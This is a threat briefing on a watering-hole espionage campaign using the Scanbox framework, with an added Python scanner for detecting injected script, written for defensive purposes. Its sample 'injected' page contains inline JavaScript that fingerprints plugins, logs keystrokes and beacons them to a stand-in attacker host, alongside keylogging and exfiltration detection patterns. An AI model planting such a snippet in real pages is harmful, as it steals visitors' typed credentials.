In this period we have noted a new cyber espionage campaign targeting simulation and system engineering software used in the automotive, aerospace and manufacturing industries. The campaign was detected after security researchers noted that a popular website associated with the software had been compromised in a watering hole attack. In a watering hole attack the attackers compromise a website that their intended victims are known to visit, so that the site itself delivers malicious code to visitors' computers. Industry-specific websites are favoured targets because their visitors are concentrated in exactly the companies the attackers wish to compromise.
The new campaign uses a reconnaissance framework known as Scanbox, delivered to visitors' computers through the Internet Explorer 8 web browser. Scanbox runs as script inside the browser rather than as a file installed on the machine, which limits what file-based anti-virus can see of it. It scans the computer and reports on the system's defences to a command and control server operated by the attackers. It also allows the attackers to determine the versions of popular software installed on the affected machine, including Adobe Flash, Microsoft Office, Acrobat Reader and Java, with a view to selecting exploits for known vulnerabilities in those versions. A keylogging module lets the attackers record what the user types on the compromised website, potentially including Personally Identifiable Information (PII) and login credentials.
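For the owner of a site that may have been used as a watering hole, the practical question is whether any page now carries script it should not. The following is an added example written for this briefing; it is not code from the original page and not Scanbox itself. It scans a page's HTML for two things: external scripts loaded from hosts outside an allowlist, and inline scripts that combine browser fingerprinting or keystroke capture with an outbound beacon, which is the pattern of capability the framework described above exhibits. The allowlisted hosts, the beacon host and both sample pages are constructed for the example; the regular expressions are generic indicators, not signatures of any real campaign.

```python
"""Heuristic scanner for watering-hole style script injection (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed for this example: hosts the site owner legitimately serves script from.
ALLOWED_SCRIPT_HOSTS = {"www.example-vendor.com", "cdn.example-vendor.com"}

# Indicators of the capabilities described in the text: client fingerprinting,
# keystroke capture, and a channel to send the results out. Generic, not signatures.
FINGERPRINT_PATTERNS = [
    r"navigator\.plugins",
    r"new\s+ActiveXObject\s*\(",        # IE-only plugin/version probes
    r"navigator\.userAgent",
]
KEYLOG_PATTERNS = [
    r"addEventListener\s*\(\s*['\"]key(down|press|up)['\"]",
    r"\.onkey(down|press|up)\s*=",
]
EXFIL_PATTERNS = [
    r"XMLHttpRequest",
    r"new\s+Image\s*\(",                # image-request beacon
    r"createElement\s*\(\s*['\"](img|script)['\"]",
]


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _matches(patterns, text):
    return [p for p in patterns if re.search(p, text)]


def scan_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of findings for one page; an empty list means nothing suspicious."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        # Absolute and protocol-relative URLs carry a host; same-origin relative ones do not.
        if host and host not in allowed_hosts:
            findings.append(f"external script from non-allowlisted host: {host}")
    for body in parser.inline:
        fp = _matches(FINGERPRINT_PATTERNS, body)
        kl = _matches(KEYLOG_PATTERNS, body)
        ex = _matches(EXFIL_PATTERNS, body)
        # A single capability is common in benign pages; capability plus a beacon is not.
        if (fp or kl) and ex:
            findings.append(
                "inline script combines "
                + ("fingerprinting " if fp else "")
                + ("keylogging " if kl else "")
                + "with an outbound beacon"
            )
    return findings


# Constructed sample pages. The clean page loads only allowlisted script.
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example-vendor.com/app.js"></script>
<script>document.getElementById('x').onclick = function(){ alert(1); };</script>
</head><body></body></html>"""

# Constructed to mimic the described technique; the beacon host is hypothetical.
INJECTED_PAGE = """<html><head>
<script src="https://cdn.example-vendor.com/app.js"></script>
<script src="//stats.attacker-c2.invalid/i.js"></script>
<script>
var ua = navigator.userAgent, p = [], k = "";
try { p.push(new ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version")); } catch (e) {}
document.onkeypress = function(e){ k += String.fromCharCode(e.keyCode); };
setInterval(function(){ new Image().src = "//stats.attacker-c2.invalid/r?d=" + encodeURIComponent(ua + p + k); }, 5000);
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page) or "no findings")
```

Run against a crawl of the site's own pages, the allowlist is the control that matters: a script host that nobody on the web team recognises is the first thing to investigate, and the inline heuristic is there to catch the case where the attacker avoided an external reference altogether.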
The sophistication of the malware and of the attack method suggests that it is the work of a state-sponsored cyber group engaged in long-term espionage against firms in the affected industries. The incident highlights the continuing popularity of watering hole attacks, arguably a response to computer users' increasing wariness of malware attachments sent by email: a trusted industry website does not raise the suspicion that an unexpected attachment now does. The campaign, likely to be one of many currently targeting Western business interests, also underlines the importance of keeping corporate and personal software up to date, since the reconnaissance described above exists precisely to find unpatched versions, and of ensuring that robust cyber defences are in place.